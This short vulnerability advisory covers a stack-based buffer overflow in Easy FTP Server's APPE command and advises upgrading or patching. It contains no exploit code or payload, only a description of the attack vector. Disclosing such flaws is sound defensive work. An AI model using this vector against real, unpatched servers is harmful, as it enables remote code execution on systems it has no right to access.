Easy FTP Server Remote Exploit

Easy FTP Server is vulnerable to a buffer overflow vulnerability in the APPE command. An attacker can send a specially crafted APPE command with an overly long string, which can cause a stack-based buffer overflow, overwriting the return address and executing arbitrary code.

Mitigation:

Upgrade to the latest version of Easy FTP Server, or apply the patch provided by the vendor.
